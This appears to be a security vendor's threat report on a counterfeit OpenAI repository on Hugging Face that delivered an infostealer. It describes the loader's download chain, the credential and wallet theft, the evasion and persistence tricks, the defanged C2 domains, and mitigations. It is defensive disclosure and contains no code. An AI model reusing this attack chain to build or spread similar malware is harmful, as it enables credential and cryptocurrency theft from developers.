Executive Summary
Recent investigations by cybersecurity experts revealed an intricate supply chain attack utilizing a counterfeit OpenAI repository on the Hugging Face platform to spread infostealer malware. This fraudulent repository, designed to imitate genuine OpenAI projects, aimed to mislead developers, data scientists, and organizations in search of artificial intelligence tools. By exploiting the trust inherent in open-source ecosystems and the popularity of Hugging Face, the attackers managed to disseminate a highly effective infostealer capable of exfiltrating sensitive credentials, session tokens, and cryptocurrency wallets. This incident highlights the pressing need for robust supply chain security and increased vigilance when engaging with open-source resources.
Threat Actor Profile
The individuals behind this operation exhibited a remarkable level of technical proficiency and operational security. Though no concrete links to a known Advanced Persistent Threat (APT) group have been established, their tactics, techniques, and procedures (TTPs) align with those typically employed by financially motivated cybercriminals and supply chain attackers. This campaign employed typosquatting—registering repository names closely resembling legitimate OpenAI projects—and utilized social engineering through trending lists and SEO manipulation to extend its reach. The infrastructure and payloads involved bear similarities to previous npm typosquatting campaigns, including the distribution of the WinOS 4.0 implant, indicating a wider, ongoing supply chain threat. Furthermore, the attackers utilized automated bots to artificially inflate download and like counts on their repositories, thereby enhancing the perceived legitimacy of these malicious projects.
Technical Analysis of Malware/TTPs
The infection process commenced with the establishment of repositories like Open-OSS/privacy-filter and others under the anthfu namespace, all crafted to impersonate official OpenAI or notable AI projects. These repositories included a loader.py script, which disguised itself as harmless AI-related code but functioned as the initial loader for the malware.
When executed, loader.py disabled SSL verification and decoded a base64-url to retrieve a remote JSON payload. This payload directed the loader to run a PowerShell command in a discreet window, which then downloaded a batch file (either update.bat or start.bat) from the attacker’s infrastructure, particularly from the domain api.eth-fastscan[.]org. The batch file escalated privileges and fetched the final Rust-based infostealer payload, called sefirah.
The infostealer displayed advanced capabilities, targeting a range of browser data—including cookies, passwords, encryption keys, session tokens from Chromium and Gecko-based browsers, Discord tokens, local databases, master keys, cryptocurrency wallets, and browser extensions—as well as SSH/FTP/VPN credentials and sensitive local files like wallet seeds and keys. Additionally, it gathered system information and took multi-monitor screenshots. Exfiltration occurred via HTTP POST requests directed to the command-and-control (C2) domain recargapopular[.]com.
To avoid detection, the malware checked for the presence of virtual machines, sandboxes, debuggers, and analysis tools. It also inserted itself into Microsoft Defender exclusions to ensure persistence. The infection mechanism and malware behavior align with various MITRE ATT&CK techniques, including T1059 (Command and Scripting Interpreter), T1566 (Phishing), T1071 (Application Layer Protocol), T1555 (Credentials from Password Stores), T1086 (PowerShell), T1204 (User Execution), and T1027 (Obfuscated Files or Information).
Exploitation in the Wild
This campaign achieved considerable reach, as the primary malicious repository (Open-OSS/privacy-filter) garnered over 244,000 downloads prior to its removal. However, analysis indicates that a significant number of these downloads were generated by automated bots to enhance the repository’s visibility and credibility. The attackers also promoted their repositories through social media platforms, such as LinkedIn and Reddit, alongside manipulating SEO to ensure that searches for OpenAI tools surfaced the malicious projects.
Victims included developers, AI/ML researchers, and organizations aiming to utilize OpenAI models or tools. Consequences ranged from credential theft and session hijacking to potential lateral movement within organizational networks and theft of cryptocurrency assets. Security vendors reported observing anomalous outbound traffic directed at the C2 infrastructure and noted attempts to access and extract credentials from compromised endpoints. The campaign’s tactics of leveraging trending repositories and typosquatting greatly elevated the risk of accidental compromise, even among security-aware users.
Victimology and Targeting
The primary targets of this campaign included individuals and organizations within the technology, AI/ML research, software development, and cryptocurrency sectors. The global nature of Hugging Face ensured that victims were spread across numerous countries, with a specific focus on English-speaking developer and research communities. The attackers specifically aimed at users seeking OpenAI tools, taking advantage of the brand’s reputation and the trust placed in platforms like Hugging Face by the open-source community. The tactics of typosquatting and replicating documentation further increased the chances of successful social engineering, as even seasoned users could be misled by the apparent authenticity of the repositories.
Mitigation and Countermeasures
Individuals and organizations that may have interacted with the compromised repositories should treat their systems as compromised and take the following actions: reimage all affected devices to guarantee complete eradication of the infostealer. Rotate all credentials, including SSH keys, browser passwords, cloud service credentials, Discord tokens, and cryptocurrency wallet seeds and keys. Additionally, invalidate all browser sessions and tokens to prevent session hijacking.
To avert future incidents, it is vital to verify the authenticity of repositories and packages before downloading or executing code, especially for high-value or security-sensitive projects. Inspect code and dependencies for suspicious activities, such as obfuscated scripts or unexpected network traffic. Implement advanced endpoint detection and response (EDR) solutions capable of identifying infostealer behavior and monitoring for outbound connections to dubious domains. Educate users and developers about the risks associated with typosquatting, social engineering, and supply chain attacks, reinforcing the significance of sourcing code only from official or well-vetted repositories.
Network monitoring should be configured to identify anomalous outbound traffic, particularly to domains like recargapopular[.]com, api.eth-fastscan[.]org, and welovechinatown[.]info. Security teams should also examine scheduled tasks and Microsoft Defender exclusions for unauthorized entries, which are commonly employed for persistence by the malware.
References
HiddenLayer: Malware Found in Trending Hugging Face Repository BleepingComputer: Fake OpenAI repository on Hugging Face pushes infostealer malware Reddit: WARNING: Open-OSS/privacy-filter MALWARE MITRE ATT&CK Framework Hugging Face Security Advisory
About Rescana
Rescana is a front-runner in third-party risk management (TPRM), offering organizations a comprehensive platform for the continuous monitoring, assessment, and mitigation of cyber risks across their digital supply chains. Our advanced threat intelligence and automation capabilities empower security teams to proactively identify and respond to emerging threats within the open-source and vendor ecosystems. For additional information or to discuss how we can assist in securing your organization, please contact us at ops@rescana.com.
